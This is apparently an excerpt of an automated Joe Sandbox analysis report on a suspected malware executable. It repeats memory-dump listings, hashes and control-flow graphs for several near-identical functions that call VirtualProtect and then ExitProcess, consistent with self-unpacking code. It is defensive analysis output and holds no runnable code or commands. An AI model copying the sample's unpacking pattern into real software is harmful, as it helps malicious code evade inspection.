                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 8f85df5fb8387f777a41b736462e0e0177c58a36f534aa0c2045b0a2e8b1d645
                                                                                                      • Instruction ID: 7fedae20c190dced846a4744f71d96b9c9d64f30830de6e117b54ce7cddf0786
                                                                                                      • Opcode Fuzzy Hash: 8f85df5fb8387f777a41b736462e0e0177c58a36f534aa0c2045b0a2e8b1d645
                                                                                                      • Instruction Fuzzy Hash: F7C1E4B1E086A88AF7248B24CC44BDABBB5AF91304F1480FAD44D57281DA7D5FC5CF96
                                                                                                      Function 00411346 Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 286COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 762 411346-41d778 call 4113d2 call 41d736 769 41d78b-41d7a0 762->769 770 41d77a-41d786 762->770 772 41d7b3-41d7d2 769->772 773 41d7a2-41d7ae 769->773 771 41da7c-41daa7 VirtualProtect 770->771 777 41dae7-41daed 771->777 778 41daa9-41dae5 call 41dad7 771->778 775 41d7e5-41d7f7 772->775 776 41d7d4-41d7e0 772->776 773->771 779 41d7f9-41d805 775->779 780 41d80a-41d873 775->780 776->771 783 41daf3-41dafa 777->783 778->783 779->771 784 41da70-41da76 780->784 785 41d879-41d8c3 780->785 787 41db33-41dbd8 call 41dbd9 783->787 788 41dafc-41db2e call 41db1e 783->788 784->771 789 41d8d4-41d8e5 785->789 797 41e07c-41e475 call 41e0ed 787->797 788->797 792 41d986-41d9d7 789->792 793 41d8eb-41d8fb 789->793 803 41d9e5-41da3c 792->803 804 41d9d9-41d9e3 792->804 793->792 796 41d901-41d952 793->796 801 41d954-41d976 796->801 802 41d978 796->802 816 41ed87-41f488 call 41edfc ExitProcess 797->816 817 41e47b-41e601 call 41e5ea 797->817 801->802 806 41d97f 801->806 802->789 809 41da4a 803->809 810 41da3e-41da48 803->810 808 41da54-41da5b 804->808 806->792 811 41da6b 808->811 812 41da5d-41da69 808->812 809->808 810->808 811->784 812->771 825 41e603-41e60d 817->825 826 41e612-41e65d 817->826 829 41e8ce-41e8f5 call 41e8ee 825->829 834 41e65f-41e669 826->834 835 41e66e-41e674 826->835 839 41e8fa 829->839 834->829 837 41e67a-41e6d2 835->837 841 41e6d9-41e7a0 call 41e6ed 837->841 839->839 844 41e7a2-41e7b8 841->844 845 41e7ba-41e7ca 841->845 847 41e81d-41e824 844->847 845->841 846 41e7d0-41e7e3 845->846 846->841 848 41e7e9-41e7f9 846->848 849 41e866-41e8b2 call 41e87e 847->849 850 41e826-41e864 call 41e837 call 41e854 847->850 852 41e807 848->852 853 41e7fb-41e805 848->853 862 41e8c4 849->862 863 41e8b4-41e8be 849->863 850->829 856 41e811-41e817 852->856 853->856 856->847 862->829 863->837 863->862
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 2d09cf0105e43d8c439ee48ebc5d02ee6073f1b5001419b3c19134c688a8b671
                                                                                                      • Instruction ID: 081ad3120ba9c8d6ea4094330e08e7720b0ff234f0f336a49f9f9d6e0f54a425
                                                                                                      • Opcode Fuzzy Hash: 2d09cf0105e43d8c439ee48ebc5d02ee6073f1b5001419b3c19134c688a8b671
                                                                                                      • Instruction Fuzzy Hash: ACC1E5B1D082A88AFB208B24DC447EABBB5EF55304F1480FAD44D57282D6795FC5CF66
                                                                                                      Function 0041D453 Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 279COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 864 41d453-41d458 866 41d6e8-41d778 call 41d736 864->866 867 41d45e call 41d46c 864->867 872 41d78b-41d7a0 866->872 873 41d77a-41d786 866->873 867->866 875 41d7b3-41d7d2 872->875 876 41d7a2-41d7ae 872->876 874 41da7c-41daa7 VirtualProtect 873->874 880 41dae7-41daed 874->880 881 41daa9-41dae5 call 41dad7 874->881 878 41d7e5-41d7f7 875->878 879 41d7d4-41d7e0 875->879 876->874 882 41d7f9-41d805 878->882 883 41d80a-41d873 878->883 879->874 886 41daf3-41dafa 880->886 881->886 882->874 887 41da70-41da76 883->887 888 41d879-41d8c3 883->888 890 41db33-41dbd8 call 41dbd9 886->890 891 41dafc-41db2e call 41db1e 886->891 887->874 892 41d8d4-41d8e5 888->892 900 41e07c-41e475 call 41e0ed 890->900 891->900 895 41d986-41d9d7 892->895 896 41d8eb-41d8fb 892->896 906 41d9e5-41da3c 895->906 907 41d9d9-41d9e3 895->907 896->895 899 41d901-41d952 896->899 904 41d954-41d976 899->904 905 41d978 899->905 919 41ed87-41f488 call 41edfc ExitProcess 900->919 920 41e47b-41e601 call 41e5ea 900->920 904->905 909 41d97f 904->909 905->892 912 41da4a 906->912 913 41da3e-41da48 906->913 911 41da54-41da5b 907->911 909->895 914 41da6b 911->914 915 41da5d-41da69 911->915 912->911 913->911 914->887 915->874 928 41e603-41e60d 920->928 929 41e612-41e65d 920->929 932 41e8ce-41e8f5 call 41e8ee 928->932 937 41e65f-41e669 929->937 938 41e66e-41e674 929->938 942 41e8fa 932->942 937->932 940 41e67a-41e6d2 938->940 944 41e6d9-41e7a0 call 41e6ed 940->944 942->942 947 41e7a2-41e7b8 944->947 948 41e7ba-41e7ca 944->948 950 41e81d-41e824 947->950 948->944 949 41e7d0-41e7e3 948->949 949->944 951 41e7e9-41e7f9 949->951 952 41e866-41e8b2 call 41e87e 950->952 953 41e826-41e864 call 41e837 call 41e854 950->953 955 41e807 951->955 956 41e7fb-41e805 951->956 965 41e8c4 952->965 966 41e8b4-41e8be 952->966 953->932 959 41e811-41e817 955->959 956->959 959->950 965->932 966->940 966->965
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 2424cf71de0d4f9f73f7b0f2096aef0e83307b0112db499ecb842e5b4b072cce
                                                                                                      • Instruction ID: 82f6fbb893f50bc920459a79915c4307710b4403766f15e7e9a6035215d86816
                                                                                                      • Opcode Fuzzy Hash: 2424cf71de0d4f9f73f7b0f2096aef0e83307b0112db499ecb842e5b4b072cce
                                                                                                      • Instruction Fuzzy Hash: A5B1F5B1E086A88AF7218B25CC447DABBB5AF91304F1440FAC44D57282DA7E5FC5CF56
                                                                                                      Function 0041D3F7 Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 278COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 967 41d3f7-41d41b 969 41d41d-41d427 967->969 970 41d42c-41d458 967->970 972 41d6e8-41d778 call 41d736 969->972 970->972 973 41d45e call 41d46c 970->973 978 41d78b-41d7a0 972->978 979 41d77a-41d786 972->979 973->972 981 41d7b3-41d7d2 978->981 982 41d7a2-41d7ae 978->982 980 41da7c-41daa7 VirtualProtect 979->980 986 41dae7-41daed 980->986 987 41daa9-41dae5 call 41dad7 980->987 984 41d7e5-41d7f7 981->984 985 41d7d4-41d7e0 981->985 982->980 988 41d7f9-41d805 984->988 989 41d80a-41d873 984->989 985->980 992 41daf3-41dafa 986->992 987->992 988->980 993 41da70-41da76 989->993 994 41d879-41d8c3 989->994 996 41db33-41dbd8 call 41dbd9 992->996 997 41dafc-41db2e call 41db1e 992->997 993->980 998 41d8d4-41d8e5 994->998 1006 41e07c-41e475 call 41e0ed 996->1006 997->1006 1001 41d986-41d9d7 998->1001 1002 41d8eb-41d8fb 998->1002 1012 41d9e5-41da3c 1001->1012 1013 41d9d9-41d9e3 1001->1013 1002->1001 1005 41d901-41d952 1002->1005 1010 41d954-41d976 1005->1010 1011 41d978 1005->1011 1025 41ed87-41f488 call 41edfc ExitProcess 1006->1025 1026 41e47b-41e601 call 41e5ea 1006->1026 1010->1011 1015 41d97f 1010->1015 1011->998 1018 41da4a 1012->1018 1019 41da3e-41da48 1012->1019 1017 41da54-41da5b 1013->1017 1015->1001 1020 41da6b 1017->1020 1021 41da5d-41da69 1017->1021 1018->1017 1019->1017 1020->993 1021->980 1034 41e603-41e60d 1026->1034 1035 41e612-41e65d 1026->1035 1038 41e8ce-41e8f5 call 41e8ee 1034->1038 1043 41e65f-41e669 1035->1043 1044 41e66e-41e674 1035->1044 1048 41e8fa 1038->1048 1043->1038 1046 41e67a-41e6d2 1044->1046 1050 41e6d9-41e7a0 call 41e6ed 1046->1050 1048->1048 1053 41e7a2-41e7b8 1050->1053 1054 41e7ba-41e7ca 1050->1054 1056 41e81d-41e824 1053->1056 1054->1050 1055 41e7d0-41e7e3 1054->1055 1055->1050 1057 41e7e9-41e7f9 1055->1057 1058 41e866-41e8b2 call 41e87e 1056->1058 1059 41e826-41e864 call 41e837 call 41e854 1056->1059 1061 41e807 1057->1061 1062 41e7fb-41e805 1057->1062 1071 41e8c4 1058->1071 1072 41e8b4-41e8be 1058->1072 1059->1038 1065 41e811-41e817 1061->1065 1062->1065 1065->1056 1071->1038 1072->1046 1072->1071
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 2667333eb444b87fe2421ae6dc4a9f393301683c21b06bf83353983efbb7a4f6
                                                                                                      • Instruction ID: 3cb8d79dc7fa17653ac5f9ec6431de5550408ff19d7b58364196ba40d1dd3bc8
                                                                                                      • Opcode Fuzzy Hash: 2667333eb444b87fe2421ae6dc4a9f393301683c21b06bf83353983efbb7a4f6
                                                                                                      • Instruction Fuzzy Hash: A5B105B1E082A88AF7208B24CC447DA7BB5AF91304F1440FAD44D57282DA7E5FC5CFA6
                                                                                                      Function 0041D3FE Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 276COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1073 41d3fe-41d41b 1074 41d41d-41d427 1073->1074 1075 41d42c-41d458 1073->1075 1077 41d6e8-41d778 call 41d736 1074->1077 1075->1077 1078 41d45e call 41d46c 1075->1078 1083 41d78b-41d7a0 1077->1083 1084 41d77a-41d786 1077->1084 1078->1077 1086 41d7b3-41d7d2 1083->1086 1087 41d7a2-41d7ae 1083->1087 1085 41da7c-41daa7 VirtualProtect 1084->1085 1091 41dae7-41daed 1085->1091 1092 41daa9-41dae5 call 41dad7 1085->1092 1089 41d7e5-41d7f7 1086->1089 1090 41d7d4-41d7e0 1086->1090 1087->1085 1093 41d7f9-41d805 1089->1093 1094 41d80a-41d873 1089->1094 1090->1085 1097 41daf3-41dafa 1091->1097 1092->1097 1093->1085 1098 41da70-41da76 1094->1098 1099 41d879-41d8c3 1094->1099 1101 41db33-41dbd8 call 41dbd9 1097->1101 1102 41dafc-41db2e call 41db1e 1097->1102 1098->1085 1103 41d8d4-41d8e5 1099->1103 1111 41e07c-41e475 call 41e0ed 1101->1111 1102->1111 1106 41d986-41d9d7 1103->1106 1107 41d8eb-41d8fb 1103->1107 1117 41d9e5-41da3c 1106->1117 1118 41d9d9-41d9e3 1106->1118 1107->1106 1110 41d901-41d952 1107->1110 1115 41d954-41d976 1110->1115 1116 41d978 1110->1116 1130 41ed87-41f488 call 41edfc ExitProcess 1111->1130 1131 41e47b-41e601 call 41e5ea 1111->1131 1115->1116 1120 41d97f 1115->1120 1116->1103 1123 41da4a 1117->1123 1124 41da3e-41da48 1117->1124 1122 41da54-41da5b 1118->1122 1120->1106 1125 41da6b 1122->1125 1126 41da5d-41da69 1122->1126 1123->1122 1124->1122 1125->1098 1126->1085 1139 41e603-41e60d 1131->1139 1140 41e612-41e65d 1131->1140 1143 41e8ce-41e8f5 call 41e8ee 1139->1143 1148 41e65f-41e669 1140->1148 1149 41e66e-41e674 1140->1149 1153 41e8fa 1143->1153 1148->1143 1151 41e67a-41e6d2 1149->1151 1155 41e6d9-41e7a0 call 41e6ed 1151->1155 1153->1153 1158 41e7a2-41e7b8 1155->1158 1159 41e7ba-41e7ca 1155->1159 1161 41e81d-41e824 1158->1161 1159->1155 1160 41e7d0-41e7e3 1159->1160 1160->1155 1162 41e7e9-41e7f9 1160->1162 1163 41e866-41e8b2 call 41e87e 1161->1163 1164 41e826-41e864 call 41e837 call 41e854 1161->1164 1166 41e807 1162->1166 1167 41e7fb-41e805 1162->1167 1176 41e8c4 1163->1176 1177 41e8b4-41e8be 1163->1177 1164->1143 1170 41e811-41e817 1166->1170 1167->1170 1170->1161 1176->1143 1177->1151 1177->1176
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 7fc610c80546e34a05600975bdebd2d42e2d436bd27a92544a600190e62a7456
                                                                                                      • Instruction ID: b9c83e078197abfba6611881e6c20cdfed83b8c0926f4c64f51e59a2c6d01ac5
                                                                                                      • Opcode Fuzzy Hash: 7fc610c80546e34a05600975bdebd2d42e2d436bd27a92544a600190e62a7456
                                                                                                      • Instruction Fuzzy Hash: C4B117B1E086A88AF7218B25CC447DA7BB5AF91304F1440FAD48D57282DA7E4FC5CF66
                                                                                                      Function 0041D66E Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 270COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1178 41d66e-41d778 call 41d736 1184 41d78b-41d7a0 1178->1184 1185 41d77a-41d786 1178->1185 1187 41d7b3-41d7d2 1184->1187 1188 41d7a2-41d7ae 1184->1188 1186 41da7c-41daa7 VirtualProtect 1185->1186 1192 41dae7-41daed 1186->1192 1193 41daa9-41dae5 call 41dad7 1186->1193 1190 41d7e5-41d7f7 1187->1190 1191 41d7d4-41d7e0 1187->1191 1188->1186 1194 41d7f9-41d805 1190->1194 1195 41d80a-41d873 1190->1195 1191->1186 1198 41daf3-41dafa 1192->1198 1193->1198 1194->1186 1199 41da70-41da76 1195->1199 1200 41d879-41d8c3 1195->1200 1202 41db33-41dbd8 call 41dbd9 1198->1202 1203 41dafc-41db2e call 41db1e 1198->1203 1199->1186 1204 41d8d4-41d8e5 1200->1204 1212 41e07c-41e475 call 41e0ed 1202->1212 1203->1212 1207 41d986-41d9d7 1204->1207 1208 41d8eb-41d8fb 1204->1208 1218 41d9e5-41da3c 1207->1218 1219 41d9d9-41d9e3 1207->1219 1208->1207 1211 41d901-41d952 1208->1211 1216 41d954-41d976 1211->1216 1217 41d978 1211->1217 1231 41ed87-41f488 call 41edfc ExitProcess 1212->1231 1232 41e47b-41e601 call 41e5ea 1212->1232 1216->1217 1221 41d97f 1216->1221 1217->1204 1224 41da4a 1218->1224 1225 41da3e-41da48 1218->1225 1223 41da54-41da5b 1219->1223 1221->1207 1226 41da6b 1223->1226 1227 41da5d-41da69 1223->1227 1224->1223 1225->1223 1226->1199 1227->1186 1240 41e603-41e60d 1232->1240 1241 41e612-41e65d 1232->1241 1244 41e8ce-41e8f5 call 41e8ee 1240->1244 1249 41e65f-41e669 1241->1249 1250 41e66e-41e674 1241->1250 1254 41e8fa 1244->1254 1249->1244 1252 41e67a-41e6d2 1250->1252 1256 41e6d9-41e7a0 call 41e6ed 1252->1256 1254->1254 1259 41e7a2-41e7b8 1256->1259 1260 41e7ba-41e7ca 1256->1260 1262 41e81d-41e824 1259->1262 1260->1256 1261 41e7d0-41e7e3 1260->1261 1261->1256 1263 41e7e9-41e7f9 1261->1263 1264 41e866-41e8b2 call 41e87e 1262->1264 1265 41e826-41e864 call 41e837 call 41e854 1262->1265 1267 41e807 1263->1267 1268 41e7fb-41e805 1263->1268 1277 41e8c4 1264->1277 1278 41e8b4-41e8be 1264->1278 1265->1244 1271 41e811-41e817 1267->1271 1268->1271 1271->1262 1277->1244 1278->1252 1278->1277
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: bd64b2fa9af42b88700f1e0b15c8f4bfa38fe7bffb98793cea001ba4e659a881
                                                                                                      • Instruction ID: 1b2ded1d9ac90be4ed1108eac136cac4d43ab203d1ad135689143fb8b19b38c7
                                                                                                      • Opcode Fuzzy Hash: bd64b2fa9af42b88700f1e0b15c8f4bfa38fe7bffb98793cea001ba4e659a881
                                                                                                      • Instruction Fuzzy Hash: 45B117B1E086A88AF7208B25CC447DA7BB5AF91304F1440FAD44D57282DA7E5FC5CFA6
                                                                                                      Function 0041D9A0 Relevance: 42.2, APIs: 1, Strings: 23, Instructions: 250memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
